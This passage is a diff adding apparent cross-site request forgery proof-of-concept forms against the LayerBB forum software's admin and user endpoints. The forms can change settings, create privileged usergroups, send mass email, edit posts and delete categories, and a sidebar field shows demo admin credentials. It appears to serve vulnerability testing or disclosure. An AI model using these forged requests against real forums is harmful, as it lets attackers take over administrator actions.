+    <input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
+    <br>
+    <input type="submit" name="update" value="Save Changes" class="btn btn-default">
+</form>
+<!-- Edit Category CSRF End -->
+
+<!-- Edit Node CSRF -->
+<form action="http://localhost/admin/edit_node.php/id/1" method="POST" style="padding: 25px;">
+    <label for="cat_title">Title</label>
+    <input type="text" name="node_title" id="cat_title" value="First Node" class="form-control">
+    <label for="cat_desc">Description</label>
+    <textarea name="node_desc" id="cat_desc" class="form-control">The first node on this forum</textarea>
+    <label for="parent">Parent</label><br>
+    <select name="node_parent" id="parent" style="width:100%;">
+    <option value="1" selected="">First Category</option>
+    </select>
+    <br>
+    <label for="additional_option">Additional Options</label><br>
+    <input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label>
+    <br>
+    <label for="allowed_usergroups">Allowed Usergroups</label><br>
+    <input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
+    <label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small>
+    <textarea name="labels" id="labels" class="form-control"></textarea><br>
+    <input type="submit" name="update" value="Save Changes" class="btn btn-default">
+</form>
+<!-- Edit Node CSRF End -->
+
+<!-- System Settings CSRF -->
+<form action="http://localhost/admin/general.php" enctype="multipart/form-data" method="POST"><section class="col-lg-12">
+    <div class="box box-success">
+    <div class="box-header">
+    <div class="tab-content" style="padding: 25px;">
+    <br>
+       <label for="site_name">Board Name</label>
+       <input type="text" class="form-control" name="site_name" id="site_name" value="LayerBB Demo">
+       <label for="board_email">Board Email</label>
+       <input type="text" class="form-control" name="board_email" id="board_email" value="demo@layerbb.com">
+       <label for="number_subs">Number of shown subforums</label>
+       <input type="text" class="form-control" name="number_subs" id="number_subs" value="3">
+       <input type="checkbox" name="register_enable" value="1" id="reg_enable" checked=""> <label for="reg_enable">Enable Registeration</label><br>
+       <input type="checkbox" name="post_merge" value="1" id="post_merge" checked=""> <label for="post_merge">Merge Posts (<a href="#" title="Merge consecutive posts by the same user." id="tooltip">?</a>)</label><br>
+       <input type="checkbox" name="site_enable" value="1" id="site_enable" checked=""> <label for="site_enable">Forum Enabled (<a href="#" title="Allows you to enable or disable your forums." id="tooltip">?</a>)</label><br>
+       <input type="checkbox" name="email_verify" value="1" id="email_verify"> <label for="email_verify">Email Verification (<a href="#" title="Allows you to enable or disable email verification." id="tooltip">?</a>)</label><br>
+       <input type="checkbox" name="enable_signatures" value="1" id="enable_signatures" checked=""> <label for="enable_signatures">Allow user signatures (<a href="#" title="Allows you to disable user signatures." id="tooltip">?</a>)</label><br>
+       <input type="checkbox" name="enable_pcomments" value="1" id="enable_pcomments" checked=""> <label for="enable_pcomments">Enable Profile Comments (<a href="#" title="Allows you to disable profile comments." id="tooltip">?</a>)</label><br>
+       <br>
+       <label for="default_language">Default Languge</label><br>
+       <select name="default_language" id="Default_language" class="form-control">
+       <option value="english" selected="">English</option>
+       </select><br>
+       <input type="checkbox" name="enable_rtl" value="1" id="enable_rtl"> <label for="enable_rtl">Enable RTL (<a href="#" title="Enable Right-to-left for languages that need RTL" id="tooltip">?</a>)</label><br><br>
+       <label for="board_rules">Board Rules</label>
+       <span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes. Hyperlinks are not supported!</span>
+       <textarea name="board_rules" class="form-control" style="min-height:250px;">- No spamming.</textarea>
+       <br>
+       <label for="offline_msg">Offline Message</label>
+       <span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes.</span>
+       <textarea name="offline_msg" class="form-control" style="min-height:250px;"></textarea>
+    <br>
+      <label for="rcap_public">reCaptcha Public Key</label>
+      <input type="text" name="rcap_public" id="rcap_public" class="form-control" value="0">
+      <label for="rcap_private">reCaptcha Private Key</label>
+      <input type="text" name="rcap_private" id="rcap_private" class="form-control" value="0">
+      <input type="checkbox" name="enable_recaptcha" value="1"> Use reCaptcha<br>
+    <br>
+      <label for="content">Board Signature</label>
+      <textarea id="editor" name="board_signature" class="form-control" style="min-height:250px;"></textarea>
+      <div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>
+    <br>
+      <label for="custom_logo">Easy Logo Changer</label>
+      <input type="file" name="custom_logo" id="custom_logo" class="form-control">
+
+    </div><br>
+  <center><input type="submit" name="update" class="btn btn-default" value="Save Settings"></center><br>
+  </div>
+  </div></section>
+</form>
+<!-- System Settings CSRF End -->
+
+<!-- Manage Category CSRF -->
+<table class="table table-hover">
+     <thead>
+       <tr>
+          <th style="width:70%">Category</th>
+          <th style="width:10%">Order</th>
+          <th style="width:20%">Controls</th>
+        </tr>
+     </thead>
+     <tbody>
+       <tr>
+        <td>
+          <strong>test cat</strong><br>
+          <small>test cat</small>
+        </td>
+        <td>
+          <form action="http://localhost/admin/manage_category.php" method="POST">
+            <input type="hidden" name="cat_id" value="2">
+            <input type="text" class="form-control" name="cat_place" value="1">
+            <input type="submit" name="change_place" style="display:none;">
+          </form>
+        </td>
+        <td>
+          <div class="btn-group">
+              <li><a href="http://localhost/admin/edit_category.php/id/2">Edit Category</a></li>
+              <li><a href="http://localhost/admin/manage_category.php/delete_category/2">Delete Category</a></li>
+          </div>
+        </td>
+      </tr><tr>
+        <td>
+          <strong>First Category</strong><br>
+          <small>First category on this forum!</small>
+        </td>
+        <td>
+          <form action="http://localhost/admin/manage_category.php" method="POST">
+            <input type="hidden" name="cat_id" value="1">
+            <input type="text" class="form-control" name="cat_place" value="2">
+            <input type="submit" name="change_place" style="display:none;">
+          </form>
+        </td>
+        <td>
+          <div class="btn-group">
+              <li><a href="http://localhost/admin/edit_category.php/id/1">Edit Category</a></li>
+              <li><a href="http://localhost/admin/manage_category.php/delete_category/1">Delete Category</a></li>
+          </div>
+        </td>
+      </tr>
+    </tbody>
+</table>
+<center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center>
+<!-- Manage Category CSRF End -->
+
+<!-- Manage Node CSRF -->
+<table class="table table-hover">
+    <thead>
+      <tr>
+        <th style="width:70%">Node</th>
+        <th style="width:10%">Order</th>
+        <th style="width:20%">Controls</th>
+      </tr>
+    </thead>
+    <tbody>
+      <tr>
+      <td>
+        <strong><a href="#" target="_blank">First Node</a></strong><br>
+        <small>The first node on this forum</small><br>
+        <small>Sub-Forums: </small>
+      </td>
+      <td>
+        <form action="http://localhost/admin/manage_node.php" method="POST">
+          <input type="hidden" name="node_id" value="1">
+          <input type="text" class="form-control" name="node_place" value="0">
+          <input type="submit" name="change_place" style="display:none;">
+        </form>
+      </td>
+      <td>
+        <div class="btn-group">
+            <li><a href="http://localhost/admin/edit_node.php/id/1">Edit Node</a></li>
+            <li><a href="http://localhost/admin/manage_node.php/delete_node/1">Delete Node</a></li>
+            <li><a href="http://localhost/admin/manage_node.php/toggle_lock/1">Toggle Lock</a></li>
+        </div>
+      </td>
+    </tr>
+    </tbody>
+</table>
+<center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center>
+<!-- Manage Node CSRF End -->
+
+<!-- Mass Mail CSRF -->
+<form action="http://localhost/admin/massemail.php" method="POST" style="padding: 25px;">
+    <label for="subject">Subject</label>
+    <input type="text" name="subject" id="subject" value="" class="form-control">
+    <label for="content">Email Content</label>
+    <textarea id="editor" name="content" class="form-control" style="min-height:250px;"></textarea><br>
+    <div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>
+    <input type="submit" name="send" value="Send Email" class="btn btn-default">
+</form>
+<!-- Mass Mail CSRF End -->
+
+<!-- Navbar CSRF -->
+<form method="POST" action="http://localhost/admin/navbar.php">
+  <h4 class="modal-title" id="myModalLabel">Editing <b>google</b> Navbar Item</h4>
+    <input type="hidden" name="id" value="1">
+    <div class="form-group">
+      <label for="title">URL Title</label>
+      <input type="text" class="form-control" id="title" name="title" value="google">
+    </div>
+    <div class="form-group">
+      <label for="url">URL</label>
+      <input type="text" class="form-control" id="url" name="url" value="https://google.com">
+    </div>
+    <div class="form-group">
+      <label for="newpage">Open URL in new page</label>
+      <select class="form-control" id="newpage" name="newpage">
+        <option value="1">Current - Do Not Change</option>
+        <option value="1">Yes</option>
+        <option value="0">No</option>
+      </select>
+    </div>
+    <div class="form-group">
+      <label for="order">Order</label>
+      <input type="text" class="form-control" id="order" name="order" value="1">
+    </div>
+    <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
+</form>
+<!-- Navbar CSRF End -->
+
+<!-- New Category CSRF -->
+<form action="http://localhost/admin/new_category.php" method="POST" style="padding: 25px;">
+   <label for="cat_title">Title</label>
+   <input type="text" name="cat_title" id="cat_title" class="form-control">
+   <label for="cat_desc">Description</label>
+   <textarea name="cat_desc" id="cat_desc" class="form-control"></textarea>
+   <br>
+   <label for="allowed_usergroups">Allowed Usergroups</label>
+   <br>
+   <input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
+   <br>
+   <input type="submit" name="create" value="Create Category" class="btn btn-default">
+</form>
+<!-- New Category CSRF End -->
+
+<!-- New Node CSRF -->
+<form action="http://localhost/admin/new_node.php" method="POST" style="padding: 25px;">
+   <label for="node_title">Title</label>
+   <input type="text" name="node_title" id="node_title" class="form-control">
+   <label for="node_desc">Description</label>
+   <textarea name="node_desc" id="node_desc" class="form-control"></textarea>
+   <label for="parent">Parent</label><br>
+   <select name="node_parent" id="parent">
+     <option value="1">First Category</option><option value="&1">&nbsp;&nbsp;&nbsp;&nbsp;-First Node</option>
+   </select>
+   <br>
+   <label for="additional_option">Additional Options</label><br>
+   <input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label>
+   <br>
+   <label for="allowed_usergroups">Allowed Usergroups</label>
+   <br>
+   <input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
+   <label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small>
+   <textarea name="labels" id="labels" class="form-control"></textarea><br>
+   <input type="submit" name="create" value="Create Node" class="btn btn-default">
+</form>
+<!-- New Node CSRF End -->
+
+<!-- New Usergroup CSRF End -->
+<form action="http://localhost/admin/new_usergroup.php" method="POST" style="padding: 25px;">
+    <label for="g_name">Name</label>
+    <input type="text" name="g_name" id="g_name" class="form-control">
+    <label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>
+    <textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea>
+    <label for="permissions">Permissions</label><br>
+    <input type="checkbox" name="permissions[]" value="1"> view_forum<br><input type="checkbox" name="permissions[]" value="2"> create_thread<br><input type="checkbox" name="permissions[]" value="3"> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br>
+    <br>
+    <input type="checkbox" name="is_staff" value="1"> This Usergroup is staff.
+    <br>
+    <input type="submit" name="new" value="Create Usergroup" class="btn btn-default">
+</form>
+<!-- New Usergroup CSRF End -->
+
+<!-- Profile Fields CSRF -->
+<form method="POST" action="http://localhost/admin/profile_fields.php" style="padding: 25px;">
+    <input type="hidden" name="id" value="1">
+    <div class="form-group">
+    <label for="title">Title</label>
+    <input type="text" class="form-control" id="title" name="title" value="discord">
+    </div>
+    <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
+</form>
+<!-- Profile Fields CSRF End -->
+
+<!-- Sidebar CSRF -->
+<form method="POST" action="http://localhost/admin/sidebar.php" style="padding: 25px;">
+    <input type="hidden" name="id" value="1">
+    <div class="form-group">
+      <label for="title">Title</label>
+      <input type="text" class="form-control" id="title" name="title" value="Demo Information">
+    </div>
+    <div class="form-group">
+      <label for="content">Content</label>
+      <textarea class="form-control" name="content" id="content" style="min-height:250px;"><div class="alert alert-danger" role="alert"> This is the LayerBB Demo Website, you can login using<br /><br /> User: Administrator <br />Pass: admin (Case sensitive)<br /><br />This demo gets refreshed every 24-hours.</div></textarea>
+    </div>
+    <div class="form-group">
+      <label for="style">Style</label>
+      <select class="form-control" id="style" name="style">
+      <option value="danger">Current - Do Not Change</option>
+      <option value="primary">Primary</option>
+      <option value="success">Success</option>
+      <option value="info">Info</option>
+      <option value="warning">Warning</option>
+      <option value="danger">Danger</option></select>
+    </div>
+    <div class="form-group">
+      <label for="glyphicon">Glyphicon (Optional)</label>
+      <input type="text" class="form-control" id="glyphicon" name="glyphicon" value="alert">
+    </div>
+    <div class="form-group">
+      <label for="order">Order</label>
+      <input type="text" class="form-control" id="order" name="order" value="1">
+    </div>
+  <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
+</form>
+<!-- Sidebar CSRF End -->
+
+<!-- Edit Threads/Posts CSRF -->
+<form id="LAYER_form" action="http://localhost/edit.php/post/1" method="POST" style="padding: 25px;">
+    <input id="title" name="title" type="text" value="test"><br>
+    <textarea id="editor" name="content" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;">test post</textarea>
+    <br>
+    <input type="submit" name="edit" value="Edit Post">
+</form>
+<!-- Edit Threads/Posts CSRF -->
+
+<!-- New Threads/Posts CSRF -->
+<form id="LAYER_form" action="http://localhost/new.php/node/1" method="POST" style="padding: 25px;">
+  <input type="text" name="title" placeholder="Thread Title..." style="width:100%;" class="col-sm-9 form-control">
+  <div class="clearfix"></div>
+  <br>
+  <textarea id="editor" style="width: 100%; height: 300px; max-width: 100%;" name="content"></textarea>
+
+  <div class="center-block" style="margin-top:5px;">
+      <input type="submit" name="create" value="Create Thread">
+  </div>
+
+  <br>
+  <ul class="nav nav-tabs">
+      <li class="active"><a href="#polls" data-toggle="tab">Polls</a></li>
+  </ul>
+  <div class="tab-content">
+      <div class="tab-pane active" id="polls">
+           <div class="col-md-6">
+               <label for="question">Question</label>
+               <input type="text" name="question">
+               <label for="answer_1">1. Answer</label>
+               <input type="text" name="answer_1" id="answer_1">
+               <label for="answer_2">2. Answer</label>
+               <input type="text" name="answer_2" id="answer_2">
+               <span class="btn btn-primary btn-xs" href="" onclick="plus();"> Add an answer field </span>
+           </div>
+      </div>
+  </div>
+</form>
+<!-- New Threads/Posts CSRF End -->
+
+<!-- Thread Reply CSRF -->
+<form id="LAYER_form" action="http://localhost/reply.php/test.1" method="POST" style="padding: 25px;">
+    <textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea>
+    <p class="pull-right" style="margin-top:5px;">
+        <input type="submit" name="reply" value="Post Reply">
+    </p>
+</form>
+<!-- Thread Reply CSRF End -->
+
+<!-- PM Reply CSRF -->
+<form id="%form_id%" action="http://localhost/conversations.php/cmd/reply/id/1" method="POST" style="padding: 25px;">
+    <textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea>
+    <p class="pull-right" style="margin-top:5px;">
+        <input type="submit" name="reply" value="Post Reply">
+    </p>
+</form>
+<!-- PM Reply CSRF End -->
+
+<!-- Report Post CSRF -->
+<form action="http://localhost/report.php/post/1" id="LAYER_form" method="POST" style="padding: 25px;">
+    <label for="reason">Reason</label>
+    <textarea name="reason" style="height:150px;width:100%;min-width:100%;max-width:100%;"></textarea>
+    <br>
+    <input type="submit" name="report" value="Report">
+</form>
+<!-- Report Post CSRF End -->
+
+<!-- Edit Profile CSRF -->
+<form id="LAYER_form" action="http://localhost/profile.php/cmd/edit" method="POST" style="padding: 25px;">
+    <label for="email">Email</label>
+    <input type="text" name="email" id="email" value="demo@layerbb.com">
+    <label for="usermsg">User Message</label>
+    <input type="text" name="usermsg" id="usermsg" value="User">
+    <label for="gender">Gender</label>
+    <select id="gender" name="gender"><option value="0" selected="selected">Not telling</option>
+    <option value="1">Female</option>
+    <option value="2">Male</option></select>
+    <label for="timezone">Timezone</label>
+    <select id="timezone" name="timezone"><option value="Pacific/Midway">(UTC-11:00) Midway Island</option><option value="Pacific/Samoa">(UTC-11:00) Samoa</option><option value="Pacific/Honolulu">(UTC-10:00) Hawaii</option><option value="US/Alaska">(UTC-09:00) Alaska</option><option value="America/Los_Angeles">(UTC-08:00) Pacific Time (US & Canada)</option><option value="America/Tijuana">(UTC-08:00) Tijuana</option><option value="US/Arizona">(UTC-07:00) Arizona</option><option value="America/Chihuahua">(UTC-07:00) Chihuahua</option><option value="America/Chihuahua">(UTC-07:00) La Paz</option><option value="America/Mazatlan">(UTC-07:00) Mazatlan</option><option value="US/Mountain">(UTC-07:00) Mountain Time (US & Canada)</option><option value="America/Managua">(UTC-06:00) Central America</option><option value="US/Central" selected="selected">(UTC-06:00) Central Time (US & Canada)</option><option value="America/Mexico_City">(UTC-06:00) Guadalajara</option><option value="America/Mexico_City">(UTC-06:00) Mexico City</option><option value="America/Monterrey">(UTC-06:00) Monterrey</option><option value="Canada/Saskatchewan">(UTC-06:00) Saskatchewan</option><option value="America/Bogota">(UTC-05:00) Bogota</option><option value="US/Eastern">(UTC-05:00) Eastern Time (US & Canada)</option><option value="US/East-Indiana">(UTC-05:00) Indiana (East)</option><option value="America/Lima">(UTC-05:00) Lima</option><option value="America/Bogota">(UTC-05:00) Quito</option><option value="Canada/Atlantic">(UTC-04:00) Atlantic Time (Canada)</option><option value="America/Caracas">(UTC-04:30) Caracas</option><option value="America/La_Paz">(UTC-04:00) La Paz</option><option value="America/Santiago">(UTC-04:00) Santiago</option><option value="Canada/Newfoundland">(UTC-03:30) Newfoundland</option><option value="America/Sao_Paulo">(UTC-03:00) Brasilia</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Buenos Aires</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Georgetown</option><option value="America/Godthab">(UTC-03:00) Greenland</option><option value="America/Noronha">(UTC-02:00) Mid-Atlantic</option><option value="Atlantic/Azores">(UTC-01:00) Azores</option><option value="Atlantic/Cape_Verde">(UTC-01:00) Cape Verde Is.</option><option value="Africa/Casablanca">(UTC+00:00) Casablanca</option><option value="Europe/London">(UTC+00:00) Edinburgh</option><option value="Etc/Greenwich">(UTC+00:00) Greenwich Mean Time : Dublin</option><option value="Europe/Lisbon">(UTC+00:00) Lisbon</option><option value="Europe/London">(UTC+00:00) London</option><option value="Africa/Monrovia">(UTC+00:00) Monrovia</option><option value="UTC">(UTC+00:00) UTC</option><option value="Europe/Amsterdam">(UTC+01:00) Amsterdam</option><option value="Europe/Belgrade">(UTC+01:00) Belgrade</option><option value="Europe/Berlin">(UTC+01:00) Berlin</option><option value="Europe/Berlin">(UTC+01:00) Bern</option><option value="Europe/Bratislava">(UTC+01:00) Bratislava</option><option value="Europe/Brussels">(UTC+01:00) Brussels</option><option value="Europe/Budapest">(UTC+01:00) Budapest</option><option value="Europe/Copenhagen">(UTC+01:00) Copenhagen</option><option value="Europe/Ljubljana">(UTC+01:00) Ljubljana</option><option value="Europe/Madrid">(UTC+01:00) Madrid</option><option value="Europe/Paris">(UTC+01:00) Paris</option><option value="Europe/Prague">(UTC+01:00) Prague</option><option value="Europe/Rome">(UTC+01:00) Rome</option><option value="Europe/Sarajevo">(UTC+01:00) Sarajevo</option><option value="Europe/Skopje">(UTC+01:00) Skopje</option><option value="Europe/Stockholm">(UTC+01:00) Stockholm</option><option value="Europe/Vienna">(UTC+01:00) Vienna</option><option value="Europe/Warsaw">(UTC+01:00) Warsaw</option><option value="Africa/Lagos">(UTC+01:00) West Central Africa</option><option value="Europe/Zagreb">(UTC+01:00) Zagreb</option><option value="Europe/Athens">(UTC+02:00) Athens</option><option value="Europe/Bucharest">(UTC+02:00) Bucharest</option><option value="Africa/Cairo">(UTC+02:00) Cairo</option><option value="Africa/Harare">(UTC+02:00) Harare</option><option value="Europe/Helsinki">(UTC+02:00) Helsinki</option><option value="Europe/Istanbul">(UTC+02:00) Istanbul</option><option value="Asia/Jerusalem">(UTC+02:00) Jerusalem</option><option value="Europe/Helsinki">(UTC+02:00) Kyiv</option><option value="Africa/Johannesburg">(UTC+02:00) Pretoria</option><option value="Europe/Riga">(UTC+02:00) Riga</option><option value="Europe/Sofia">(UTC+02:00) Sofia</option><option value="Europe/Tallinn">(UTC+02:00) Tallinn</option><option value="Europe/Vilnius">(UTC+02:00) Vilnius</option><option value="Asia/Baghdad">(UTC+03:00) Baghdad</option><option value="Asia/Kuwait">(UTC+03:00) Kuwait</option><option value="Europe/Minsk">(UTC+03:00) Minsk</option><option value="Africa/Nairobi">(UTC+03:00) Nairobi</option><option value="Asia/Riyadh">(UTC+03:00) Riyadh</option><option value="Europe/Volgograd">(UTC+03:00) Volgograd</option><option value="Asia/Tehran">(UTC+03:30) Tehran</option><option value="Asia/Muscat">(UTC+04:00) Abu Dhabi</option><option value="Asia/Baku">(UTC+04:00) Baku</option><option value="Europe/Moscow">(UTC+04:00) Moscow</option><option value="Asia/Muscat">(UTC+04:00) Muscat</option><option value="Europe/Moscow">(UTC+04:00) St. Petersburg</option><option value="Asia/Tbilisi">(UTC+04:00) Tbilisi</option><option value="Asia/Yerevan">(UTC+04:00) Yerevan</option><option value="Asia/Kabul">(UTC+04:30) Kabul</option><option value="Asia/Karachi">(UTC+05:00) Islamabad</option><option value="Asia/Karachi">(UTC+05:00) Karachi</option><option value="Asia/Tashkent">(UTC+05:00) Tashkent</option><option value="Asia/Calcutta">(UTC+05:30) Chennai</option><option value="Asia/Kolkata">(UTC+05:30) Kolkata</option><option value="Asia/Calcutta">(UTC+05:30) Mumbai</option><option value="Asia/Calcutta">(UTC+05:30) New Delhi</option><option value="Asia/Calcutta">(UTC+05:30) Sri Jayawardenepura</option><option value="Asia/Katmandu">(UTC+05:45) Kathmandu</option><option value="Asia/Almaty">(UTC+06:00) Almaty</option><option value="Asia/Dhaka">(UTC+06:00) Astana</option><option value="Asia/Dhaka">(UTC+06:00) Dhaka</option><option value="Asia/Yekaterinburg">(UTC+06:00) Ekaterinburg</option><option value="Asia/Rangoon">(UTC+06:30) Rangoon</option><option value="Asia/Bangkok">(UTC+07:00) Bangkok</option><option value="Asia/Bangkok">(UTC+07:00) Hanoi</option><option value="Asia/Jakarta">(UTC+07:00) Jakarta</option><option value="Asia/Novosibirsk">(UTC+07:00) Novosibirsk</option><option value="Asia/Hong_Kong">(UTC+08:00) Beijing</option><option value="Asia/Chongqing">(UTC+08:00) Chongqing</option><option value="Asia/Hong_Kong">(UTC+08:00) Hong Kong</option><option value="Asia/Krasnoyarsk">(UTC+08:00) Krasnoyarsk</option><option value="Asia/Kuala_Lumpur">(UTC+08:00) Kuala Lumpur</option><option value="Australia/Perth">(UTC+08:00) Perth</option><option value="Asia/Singapore">(UTC+08:00) Singapore</option><option value="Asia/Taipei">(UTC+08:00) Taipei</option><option value="Asia/Ulan_Bator">(UTC+08:00) Ulaan Bataar</option><option value="Asia/Urumqi">(UTC+08:00) Urumqi</option><option value="Asia/Irkutsk">(UTC+09:00) Irkutsk</option><option value="Asia/Tokyo">(UTC+09:00) Osaka</option><option value="Asia/Tokyo">(UTC+09:00) Sapporo</option><option value="Asia/Seoul">(UTC+09:00) Seoul</option><option value="Asia/Tokyo">(UTC+09:00) Tokyo</option><option value="Australia/Adelaide">(UTC+09:30) Adelaide</option><option value="Australia/Darwin">(UTC+09:30) Darwin</option><option value="Australia/Brisbane">(UTC+10:00) Brisbane</option><option value="Australia/Canberra">(UTC+10:00) Canberra</option><option value="Pacific/Guam">(UTC+10:00) Guam</option><option value="Australia/Hobart">(UTC+10:00) Hobart</option><option value="Australia/Melbourne">(UTC+10:00) Melbourne</option><option value="Pacific/Port_Moresby">(UTC+10:00) Port Moresby</option><option value="Australia/Sydney">(UTC+10:00) Sydney</option><option value="Asia/Yakutsk">(UTC+10:00) Yakutsk</option><option value="Asia/Vladivostok">(UTC+11:00) Vladivostok</option><option value="Pacific/Auckland">(UTC+12:00) Auckland</option><option value="Pacific/Fiji">(UTC+12:00) Fiji</option><option value="Pacific/Kwajalein">(UTC+12:00) International Date Line West</option><option value="Asia/Kamchatka">(UTC+12:00) Kamchatka</option><option value="Asia/Magadan">(UTC+12:00) Magadan</option><option value="Pacific/Fiji">(UTC+12:00) Marshall Is.</option><option value="Asia/Magadan">(UTC+12:00) New Caledonia</option><option value="Asia/Magadan">(UTC+12:00) Solomon Is.</option><option value="Pacific/Auckland">(UTC+12:00) Wellington</option><option value="Pacific/Tongatapu">(UTC+13:00) Nuku'alofa</option></select>
+    <br>
+    <label for="location">Location</label>
+    <select id="location" name="location"><option value="--" selected="selected">Nothing selected</option><option value="AD">Andorra</option><option value="AE">United Arab Emirates</option><option value="AF">Afghanistan</option><option value="AG">Antigua and Barbuda</option><option value="AI">Anguilla</option><option value="AL">Albania</option><option value="AM">Armenia</option><option value="AO">Angola</option><option value="AQ">Antarctica</option><option value="AR">Argentina</option><option value="AS">American Samoa</option><option value="AT">Austria</option><option value="AU">Australia</option><option value="AW">Aruba</option><option value="AX">Aland Islands</option><option value="AZ">Azerbaijan</option><option value="BA">Bosnia and Herzegovina</option><option value="BB">Barbados</option><option value="BD">Bangladesh</option><option value="BE">Belgium</option><option value="BF">Burkina Faso</option><option value="BG">Bulgaria</option><option value="BH">Bahrain</option><option value="BI">Burundi</option><option value="BJ">Benin</option><option value="BL">Saint Barthélemy</option><option value="BM">Bermuda</option><option value="BN">Brunei Darussalam</option><option value="BO">Bolivia</option><option value="BQ">Bonaire</option><option value="BR">Brazil</option><option value="BS">Bahamas</option><option value="BT">Bhutan</option><option value="BV">Bouvet Island</option><option value="BW">Botswana</option><option value="BY">Belarus</option><option value="BZ">Belize</option><option value="CA">Canada</option><option value="CC">Cocos Islands</option><option value="CD">Congo (the Democratic Republic)</option><option value="CF">Central African Republic</option><option value="CG">Congo</option><option value="CH">Switzerland</option><option value="CI">Cote d'Ivoire</option><option value="CK">Cook Islands</option><option value="CL">Chile</option><option value="CM">Cameroon</option><option value="CN">China</option><option value="CO">Colombia</option><option value="CR">Costa Rica</option><option value="CU">Cuba</option><option value="CV">Cabo Verde</option><option value="CW">Curacao</option><option value="CX">Christmas Island</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DE">Germany</option><option value="DJ">Djibouti</option><option value="DK">Denmark</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="DZ">Algeria</option><option value="EC">Ecuador</option><option value="EE">Estonia</option><option value="EG">Egypt</option><option value="EH">Western Sahara</option><option value="ER">Eritrea</option><option value="ES">Spain</option><option value="ET">Ethiopia</option><option value="FI">Finland</option><option value="FJ">Fiji</option><option value="FK">Falkland Islands</option><option value="FM">Micronesia</option><option value="FO">Faroe Islands</option><option value="FR">France</option><option value="GA">Gabon</option><option value="GB">United Kingdom</option><option value="GD">Grenada</option><option value="GE">Georgia</option><option value="GF">French Guiana</option><option value="GG">Guernsey</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GL">Greenland</option><option value="GM">Gambia</option><option value="GN">Guinea</option><option value="GP">Guadeloupe</option><option value="GQ">Equatorial Guinea</option><option value="GR">Greece</option><option value="GS">South Georgia and the South Sandwich Islands</option><option value="GT">Guatemala</option><option value="GU">Guam</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HK">Hong Kong</option><option value="HM">Heard Island and McDonald Islands</option><option value="HN">Honduras</option><option value="HR">Croatia</option><option value="HT">Haiti</option><option value="HU">Hungary</option><option value="ID">Indonesia</option><option value="IE">Ireland</option><option value="IL">Israel</option><option value="IM">Isle of Man</option><option value="IN">India</option><option value="IO">British Indian Ocean Territory</option><option value="IQ">Iraq</option><option value="IR">Iran</option><option value="IS">Iceland</option><option value="IT">Italy</option><option value="JE">Jersey</option><option value="JM">Jamaica</option><option value="JO">Jordan</option><option value="JP">Japan</option><option value="KE">Kenya</option><option value="KG">Kyrgyzstan</option><option value="KH">Cambodia</option><option value="KI">Kiribati</option><option value="KM">Comoros</option><option value="KN">Saint Kitts and Nevis</option><option value="KP">The Democratic People's Republic of Korea</option><option value="KR">The Republic of Korea</option><option value="KW">Kuwait</option><option value="KY">Cayman Islands</option><option value="KZ">Kazakhstan</option><option value="LA">Lao People's Democratic Republic</option><option value="LB">Lebanon</option><option value="LC">Saint Lucia</option><option value="LI">Liechtenstein</option><option value="LK">Sri Lanka</option><option value="LR">Liberia</option><option value="LS">Lesotho</option><option value="LT">Lithuania</option><option value="LU">Luxembourg</option><option value="LV">Latvia</option><option value="LY">Libya</option><option value="MA">Morocco</option><option value="MC">Monaco</option><option value="MD">Moldova</option><option value="ME">Montenegro</option><option value="MF">Saint Martin</option><option value="MG">Madagascar</option><option value="MH">Marshall Islands</option><option value="MK">Macedonia</option><option value="ML">Mali</option><option value="MM">Myanmar</option><option value="MN">Mongolia</option><option value="MO">Macao</option><option value="MP">Northern Mariana Islands</option><option value="MQ">Martinique</option><option value="MR">Mauritania</option><option value="MS">Montserrat</option><option value="MT">Malta</option><option value="MU">Mauritius</option><option value="MV">Maldives</option><option value="MW">Malawi</option><option value="MX">Mexico</option><option value="MY">Malaysia</option><option 